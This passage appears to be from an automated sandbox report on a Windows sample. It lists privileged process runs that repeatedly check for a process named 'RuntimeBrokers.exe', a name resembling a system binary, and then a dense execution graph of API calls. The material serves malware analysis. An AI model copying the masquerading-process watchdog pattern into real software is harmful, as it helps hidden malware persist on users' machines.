                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:45
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:46
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:47
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:48
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:49
                                                              Start time:03:51:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:17.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:26.9%
                                                                Total number of Nodes:1422
                                                                Total number of Limit Nodes:15
CreateWindowExW 9127->9432 9130 404fdc 9131 40648e MessageBoxA 9130->9131 9133 404ff6 9130->9133 9132 4064a5 exit _XcptFilter 9131->9132 9134 401411 2 API calls 9133->9134 9135 40502d 9134->9135 9136 401411 2 API calls 9135->9136 9137 405035 9136->9137 9435 403e23 9137->9435 9142 40254d 2 API calls 9143 405073 9142->9143 9444 402a69 9143->9444 9145 40507c 9458 403d71 9145->9458 9148 40509b _wtol 9150 4050b1 9148->9150 9463 404405 9150->9463 9151 4050d6 9152 403d71 6 API calls 9151->9152 9153 4050e1 9152->9153 9154 4050e7 9153->9154 9155 405118 9153->9155 9654 404996 9154->9654 9156 405130 GetModuleFileNameW 9155->9156 9158 40112b 2 API calls 9155->9158 9159 405151 9156->9159 9160 405142 9156->9160 9158->9156 9165 403d71 6 API calls 9159->9165 9162 407776 55 API calls 9160->9162 9161 4050ee ??3@YAXPAX 9672 403e70 9161->9672 9170 4050ec 9162->9170 9164 4050ff ??3@YAXPAX ??3@YAXPAX 9164->9132 9177 405173 9165->9177 9166 4052d5 9167 401362 2 API calls 9166->9167 9168 4052e5 9167->9168 9169 401362 2 API calls 9168->9169 9174 4052f2 9169->9174 9170->9161 9171 4051fa 9171->9170 9172 40522a 9171->9172 9176 405213 _wtol 9171->9176 9173 403d71 6 API calls 9172->9173 9182 405289 9173->9182 9175 40538d ??2@YAPAXI 9174->9175 9178 401329 2 API calls 9174->9178 9184 405399 9175->9184 9176->9172 9177->9166 9177->9170 9177->9171 9177->9172 9181 401429 2 API calls 9177->9181 9179 405327 9178->9179 9180 401329 2 API calls 9179->9180 9186 40533d 9180->9186 9181->9177 9182->9166 9183 404594 2 API calls 9182->9183 9185 4052ba 9183->9185 9187 4053cf 9184->9187 9191 407776 55 API calls 9184->9191 9185->9166 9189 401362 2 API calls 9185->9189 9190 401362 2 API calls 9186->9190 9488 4025ae 9187->9488 9189->9166 9193 405367 9190->9193 9191->9187 9195 401f9d 19 API calls 9193->9195 9194 4025ae 2 API calls 9197 4053f6 9194->9197 9196 40536e 9195->9196 9198 40254d 2 API calls 9196->9198 9199 4025ae 2 API calls 9197->9199 9200 405377 9198->9200 9201 4053fe 9199->9201 9200->9175 9491 404e3f 
9201->9491 9206 40546f 9208 405534 9206->9208 9211 403d71 6 API calls 9206->9211 9207 402844 10 API calls 9209 405441 9207->9209 9210 40e8da 3 API calls 9208->9210 9209->9206 9214 407776 55 API calls 9209->9214 9212 40553c 9210->9212 9213 405493 9211->9213 9215 405573 9212->9215 9519 403093 9212->9519 9213->9208 9221 40549d 9213->9221 9216 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9214->9216 9218 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9215->9218 9219 40557c 9215->9219 9216->9206 9218->9161 9218->9170 9223 405588 wsprintfW 9219->9223 9224 4055ed 9219->9224 9230 401411 2 API calls 9219->9230 9231 401329 ??2@YAPAXI ??3@YAXPAX 9219->9231 9234 401f9d 19 API calls 9219->9234 9703 402f6c ??2@YAPAXI 9219->9703 9709 402425 ??3@YAXPAX ??3@YAXPAX 9219->9709 9221->9218 9677 404cbc 9221->9677 9222 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9225 4054f5 9222->9225 9226 401411 2 API calls 9223->9226 9553 404603 9224->9553 9225->9218 9226->9219 9229 4054cc 9229->9218 9232 407776 55 API calls 9229->9232 9230->9219 9231->9219 9233 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9232->9233 9233->9225 9234->9219 9235 40584a 9236 404603 26 API calls 9235->9236 9268 40586a 9236->9268 9240 405933 9615 404034 9240->9615 9241 4024fc 2 API calls 9241->9268 9245 4059d8 CoInitialize 9252 40243b lstrcmpW 9245->9252 9246 40595a 9249 40243b lstrcmpW 9246->9249 9247 405935 ??3@YAXPAX 9247->9240 9251 405969 9249->9251 9250 401411 ??2@YAPAXI ??3@YAXPAX 9250->9268 9253 405979 9251->9253 9255 401f9d 19 API calls 9251->9255 9254 4059fe 9252->9254 9736 403b40 9253->9736 9256 405a12 9254->9256 9259 401329 2 API calls 9254->9259 9255->9253 9621 403b59 9256->9621 9258 401362 2 API calls 9258->9268 9259->9256 9262 4055f6 9262->9235 9275 403b94 lstrlenW lstrlenW _wcsnicmp 9262->9275 9279 4057dd _wtol 9262->9279 9296 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9262->9296 9710 40484d 9262->9710 9721 40408b 9262->9721 9264 4073d1 21 API calls 9267 40599c 9264->9267 9265 401329 2 API calls 9265->9268 9266 405a4d 9270 405a2b 
??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9266->9270 9310 405a61 9266->9310 9756 4082e9 9266->9756 9271 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9271 9268->9240 9268->9241 9268->9247 9268->9250 9268->9258 9268->9265 9273 402f6c 7 API calls 9268->9273 9612 40243b 9268->9612 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9270->9266 9271->9170 9273->9268 9275->9262 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9310 9279->9262 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302 405bf3 9280->9302 9281 405a9f GetKeyState 9281->9310 9282 405c6c 9283 405ca2 9282->9283 9284 405c74 9282->9284 9288 4012f7 2 API calls 9283->9288 9798 403f85 9284->9798 9286 401429 ??2@YAPAXI ??3@YAXPAX 9286->9310 9289 405cb0 9288->9289 9292 403b59 15 API calls 9289->9292 9297 405cb9 9292->9297 9293 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9293->9298 9294 40243b lstrcmpW 9294->9310 9295 401362 2 API calls 9299 405c91 ??3@YAXPAX 9295->9299 9296->9170 9301 405cca ??3@YAXPAX 9297->9301 9305 401362 2 API calls 9297->9305 9298->9302 9306 405cd9 9299->9306 9300 401329 ??2@YAPAXI ??3@YAXPAX 9300->9310 9301->9306 9302->9293 9303 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9302->9303 9303->9302 9304 405bcd ??3@YAXPAX 9304->9310 9305->9301 9307 405d24 9306->9307 9308 405d16 9306->9308 9811 40786b 9307->9811 9628 404a44 9308->9628 9310->9277 9310->9280 9310->9281 9310->9282 9310->9286 9310->9294 9310->9300 9310->9302 9310->9303 9310->9304 9783 407613 9310->9783 9792 407674 9310->9792 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 401411 2 API calls 9316->9318 9319 406373 9316->9319 9320 405d95 9318->9320 9321 4063f7 9319->9321 9324 40243b lstrcmpW 9319->9324 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9326 406461 9323->9326 9327 406467 ??3@YAXPAX 9323->9327 9325 4063a4 9324->9325 
9325->9321 9848 403f48 9325->9848 9326->9327 9328 403e70 4 API calls 9327->9328 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9339 405de5 9335->9339 9340 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9340 9337 4012f7 2 API calls 9336->9337 9342 406432 9337->9342 9338 4073d1 21 API calls 9343 4063e0 ??3@YAXPAX 9338->9343 9830 4043c6 9339->9830 9344 406312 9340->9344 9341 40243b lstrcmpW 9341->9364 9853 404aff 9342->9853 9343->9321 9347 40636a ??3@YAXPAX 9344->9347 9350 404034 21 API calls 9344->9350 9346 405e45 9352 401329 2 API calls 9346->9352 9347->9319 9355 406321 9350->9355 9356 405e4e 9352->9356 9353 4043c6 2 API calls 9354 405e0e 9353->9354 9357 401362 2 API calls 9354->9357 9838 4048ab 9355->9838 9361 403b7f 19 API calls 9356->9361 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9357->9362 9359 40626b ??3@YAXPAX ??3@YAXPAX 9359->9344 9360 401329 2 API calls 9360->9364 9377 405e57 9361->9377 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9341 9364->9346 9364->9359 9364->9360 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9346 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9347 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9359 9378 405f61 _wtol 9377->9378 9379 403bce lstrlenW lstrlenW _wcsnicmp 9377->9379 9380 406025 9377->9380 9378->9377 9379->9377 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 
40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9648 4021ed 9409->9648 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9344 9414->9340 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9421 40254d 2 API calls 9418->9421 9422 406282 9419->9422 9423 40618c 9419->9423 9421->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 401429 ??2@YAPAXI ??3@YAXPAX 9448->9453 9449 402b5f 9449->9446 9451 401411 2 API calls 9451->9453 9453->9448 9453->9449 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 
40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9148 9460->9150 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9151 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9207 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 4025ae 2 API calls 9519->9520 9536 
4030a8 9520->9536 9521 403301 9522 403344 ??3@YAXPAX 9521->9522 9523 40334e 9522->9523 9523->9215 9523->9222 9524 401411 ??2@YAPAXI ??3@YAXPAX 9524->9536 9526 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9526->9536 9527 401362 2 API calls 9528 4030f3 ??3@YAXPAX ??3@YAXPAX 9527->9528 9529 403303 9528->9529 9528->9536 9956 4029c3 9529->9956 9533 40331c ??3@YAXPAX 9533->9523 9534 4031e5 strncmp 9535 4031d0 strncmp 9534->9535 9534->9536 9535->9534 9535->9536 9536->9521 9536->9524 9536->9526 9536->9527 9536->9529 9536->9534 9537 401362 2 API calls 9536->9537 9538 402640 2 API calls 9536->9538 9541 402640 ??2@YAPAXI ??3@YAXPAX 9536->9541 9544 402f6c 7 API calls 9536->9544 9546 403330 9536->9546 9547 4032b2 lstrcmpW 9536->9547 9551 401329 2 API calls 9536->9551 9946 402986 9536->9946 9951 4023dd 9536->9951 9955 402425 ??3@YAXPAX ??3@YAXPAX 9536->9955 9539 403252 ??3@YAXPAX 9537->9539 9538->9535 9540 402a69 9 API calls 9539->9540 9542 403263 lstrcmpW 9540->9542 9541->9536 9542->9536 9544->9536 9549 402f6c 7 API calls 9546->9549 9547->9536 9548 4032c0 lstrcmpW 9547->9548 9548->9536 9550 40333c 9549->9550 9974 402425 ??3@YAXPAX ??3@YAXPAX 9550->9974 9551->9536 9554 40243b lstrcmpW 9553->9554 9555 40461c 9554->9555 9556 40466c 9555->9556 9558 401329 2 API calls 9555->9558 9557 40243b lstrcmpW 9556->9557 9559 40468a 9557->9559 9560 404633 9558->9560 9563 40243b lstrcmpW 9559->9563 9561 401f9d 19 API calls 9560->9561 9562 40463a 9561->9562 9565 40254d 2 API calls 9562->9565 9564 4046a2 9563->9564 9567 40243b lstrcmpW 9564->9567 9566 404643 9565->9566 9568 401329 2 API calls 9566->9568 9569 4046ba 9567->9569 9570 40465c 9568->9570 9572 40243b lstrcmpW 9569->9572 9571 401f9d 19 API calls 9570->9571 9573 404663 9571->9573 9574 4046d2 9572->9574 9575 40254d 2 API calls 9573->9575 9576 4046e9 9574->9576 9577 4046d9 lstrcmpiW 9574->9577 9575->9556 9578 40243b lstrcmpW 9576->9578 9577->9576 9579 4046ff 9578->9579 9580 40243b lstrcmpW 9579->9580 9581 40472c 9580->9581 9582 404739 
9581->9582 9976 403d1f 9581->9976 9584 40243b lstrcmpW 9582->9584 9588 40474d 9584->9588 9585 40476d 9586 40243b lstrcmpW 9585->9586 9593 404780 9586->9593 9588->9585 9589 40243b lstrcmpW 9588->9589 9980 403cc6 9588->9980 9589->9588 9590 4047a0 9592 40243b lstrcmpW 9590->9592 9594 4047ac 9592->9594 9593->9590 9595 40243b lstrcmpW 9593->9595 9984 403cf7 9593->9984 9596 40243b lstrcmpW 9594->9596 9595->9593 9597 4047bd 9596->9597 9598 40243b lstrcmpW 9597->9598 9599 4047ce 9598->9599 9600 4047e4 9599->9600 9601 4047db _wtol 9599->9601 9602 40243b lstrcmpW 9600->9602 9601->9600 9603 4047f0 9602->9603 9604 404800 9603->9604 9605 4047f7 _wtol 9603->9605 9606 40243b lstrcmpW 9604->9606 9605->9604 9607 40480c 9606->9607 9608 40243b lstrcmpW 9607->9608 9609 404824 9608->9609 9610 40243b lstrcmpW 9609->9610 9611 40483c 9610->9611 9611->9262 9613 4023dd lstrcmpW 9612->9613 9614 40244c 9613->9614 9614->9268 9616 404045 9615->9616 9617 404088 9615->9617 9618 4012f7 2 API calls 9616->9618 9619 403b7f 19 API calls 9616->9619 9617->9245 9617->9246 9618->9616 9620 404062 SetEnvironmentVariableW ??3@YAXPAX 9619->9620 9620->9616 9620->9617 9622 40393b 7 API calls 9621->9622 9623 403b69 9622->9623 9624 4039f6 7 API calls 9623->9624 9625 403b74 9624->9625 9626 4027c7 6 API calls 9625->9626 9627 403b7a 9626->9627 9627->9266 9739 4083b6 9627->9739 9992 408676 9628->9992 9630 404a55 ??2@YAPAXI 9631 404a64 9630->9631 9645 40dcfb 3 API calls 9631->9645 9632 404a85 9994 40a7de _EH_prolog 9632->9994 10010 40b2fc 9632->10010 9633 404a95 9634 404ab3 9633->9634 9635 404a99 9633->9635 9637 404ada ??2@YAPAXI 9634->9637 9641 403354 86 API calls 9634->9641 9636 407776 55 API calls 9635->9636 9640 404aa1 9636->9640 9638 404ae6 9637->9638 9639 404aed 9637->9639 10035 404292 9638->10035 10016 40150b 9639->10016 9640->9312 9643 404ac6 9641->9643 9643->9637 9643->9640 9645->9632 9649 402200 LoadLibraryA GetProcAddress 9648->9649 9650 4021fb 9648->9650 9651 40221b 9649->9651 9652 402223 9649->9652 
9650->9410 9650->9415 9650->9416 9651->9650 9652->9651 10498 4021b9 LoadLibraryA GetProcAddress 9652->10498 9655 40661a 2 API calls 9654->9655 9656 4049af 9655->9656 9657 401f9d 19 API calls 9656->9657 9658 4049bd 9657->9658 9659 4024fc 2 API calls 9658->9659 9660 4049c7 9659->9660 9661 4049fd 9660->9661 9663 40254d ??2@YAPAXI ??3@YAXPAX 9660->9663 9662 40254d 2 API calls 9661->9662 9664 404a0a 9662->9664 9663->9660 9665 401f9d 19 API calls 9664->9665 9666 404a11 9665->9666 9667 40254d 2 API calls 9666->9667 9668 404a1b 9667->9668 9669 4073d1 21 API calls 9668->9669 9670 404a30 ??3@YAXPAX 9669->9670 9671 404a41 9670->9671 9671->9170 9673 40e8da 3 API calls 9672->9673 9674 403e7e 9673->9674 9675 40e8da 3 API calls 9674->9675 9676 40e943 ??3@YAXPAX 9675->9676 9676->9164 9678 40db53 2 API calls 9677->9678 9679 404ce8 9678->9679 9680 404d44 9679->9680 9682 4024fc 2 API calls 9679->9682 9681 4025ae 2 API calls 9680->9681 9683 404d4c 9681->9683 9684 404cf7 9682->9684 9685 403e86 2 API calls 9683->9685 9688 404db5 ??3@YAXPAX 9684->9688 9690 403354 86 API calls 9684->9690 9686 404d59 9685->9686 9687 403ef6 2 API calls 9686->9687 9689 404d66 9687->9689 9702 404db1 9688->9702 9691 403ef6 2 API calls 9689->9691 9692 404d1b 9690->9692 9693 404d73 9691->9693 9692->9688 9695 40db53 2 API calls 9692->9695 9694 403ef6 2 API calls 9693->9694 9696 404d80 9694->9696 9697 404d37 9695->9697 9698 40dd5f 2 API calls 9696->9698 9697->9688 9699 404d3b ??3@YAXPAX 9697->9699 9700 404d94 9698->9700 9699->9680 9700->9688 9701 404d9d ??3@YAXPAX 9700->9701 9701->9702 9702->9229 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 
9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9262 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9262 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9264 9740 408646 9739->9740 9752 4083d5 9739->9752 9740->9270 9741 40243b lstrcmpW 9741->9752 9742 40661a 2 API calls 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 407776 55 API calls 9749->9752 9750 403f48 4 API calls 9750->9752 9751 4073d1 21 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9766 408333 9761->9766 10521 4019f0 GetStdHandle WriteFile 9761->10521 9765 40243b lstrcmpW 9768 408351 9765->9768 9767 408344 9766->9767 10522 4019f0 GetStdHandle WriteFile 9766->10522 9767->9765 9769 40835f 9768->9769 10523 4019f0 GetStdHandle WriteFile 9768->10523 9771 40243b lstrcmpW 9769->9771 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 
9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9310 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9310 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9807 403fcf 9802->9807 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9807 9806 402535 2 API calls 9808 403ff2 wsprintfW 9806->9808 9807->9806 9809 404009 GetFileAttributesW 9807->9809 9810 40402d 9807->9810 9808->9807 9809->9807 9809->9810 9810->9295 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 
9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9338 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 